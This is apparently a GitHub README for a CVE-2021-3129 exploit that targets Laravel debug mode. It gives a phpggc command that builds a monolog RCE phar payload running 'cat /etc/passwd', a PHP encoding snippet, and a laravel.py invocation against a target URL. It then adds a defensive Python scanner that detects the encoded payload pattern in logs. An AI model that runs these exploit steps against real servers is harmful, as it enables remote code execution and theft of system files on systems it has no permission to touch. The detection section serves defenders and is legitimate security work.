0nion1/CVE-2021-3129

CVE-2021-3129

Generate a phar package with a custom command:
php -d'phar.readonly=0' ./phpggc monolog/rce1 system "cat /etc/passwd" --phar phar -o php://output | base64 -w0

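Run php -a to enter the PHP interactive shell:
// Write to stdout through PHP's quoted-printable encoding stream filter
$fp = fopen('php://output', 'w');
stream_filter_append($fp, 'convert.quoted-printable-encode');
$size = "";
// Convert the string to UTF-16LE before it passes through the filter
fwrite($fp, iconv('utf-8','utf-16le',$size));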

Save the generated payload to a file, then pass it to the script:
python laravel.py --url "http(s)://192.168.0.109:8000/" --phar test.phar
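
For defenders, the encoding produced by the PHP snippet above (base64 text converted to UTF-16LE, then quoted-printable encoded) leaves a recognisable pattern: each character is followed by `=00`. The scanner below is an added example, not part of this repository; the names `find_runs` and `MIN_UNITS`, the threshold value, and the idea of running it over application logs or captured request bodies are assumptions, and the sample log lines are constructed.

```python
import base64
import quopri
import re

# One UTF-16LE code unit of a base64 character after quoted-printable encoding:
# the character (or its =XX escape) followed by the encoded zero high byte.
UNIT = r"(?:[A-Za-z0-9+/]|=3D|=2B|=2F)=00"
MIN_UNITS = 8  # assumption: shorter runs are treated as noise
RUN = re.compile("(?:" + UNIT + r"(?:=\r?\n)?){" + str(MIN_UNITS) + ",}")


def find_runs(text):
    """Return one finding per encoded run: line number, recovered base64, decoded prefix."""
    findings = []
    for m in RUN.finditer(text):
        # Undo quoted-printable (soft line breaks included), then UTF-16LE.
        b64 = quopri.decodestring(m.group(0).encode("ascii")).decode("utf-16-le")
        usable = b64[: len(b64) - len(b64) % 4]  # base64 decodes in 4-char groups
        try:
            prefix = base64.b64decode(usable)[:16]
        except ValueError:
            prefix = b""
        findings.append({
            "line": text.count("\n", 0, m.start()) + 1,
            "base64": b64,
            "decoded_prefix": prefix,
        })
    return findings


# Constructed sample log; the encoded run carries base64 of the string "hello".
SAMPLE_LOG = (
    "[2021-01-20 10:00:00] local.INFO: user login ok\n"
    "[2021-01-20 10:00:01] local.ERROR: bad input a=00G=00V=00s=00b=00G=008=00=3D=00\n"
    "[2021-01-20 10:00:02] local.INFO: quota=00 units\n"
)

if __name__ == "__main__":
    for hit in find_runs(SAMPLE_LOG):
        print(hit)
```

The decoded prefix gives a triage analyst the first bytes of whatever was encoded, without writing the content to disk.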

About

CVE-2021-3129-Laravel Debug mode
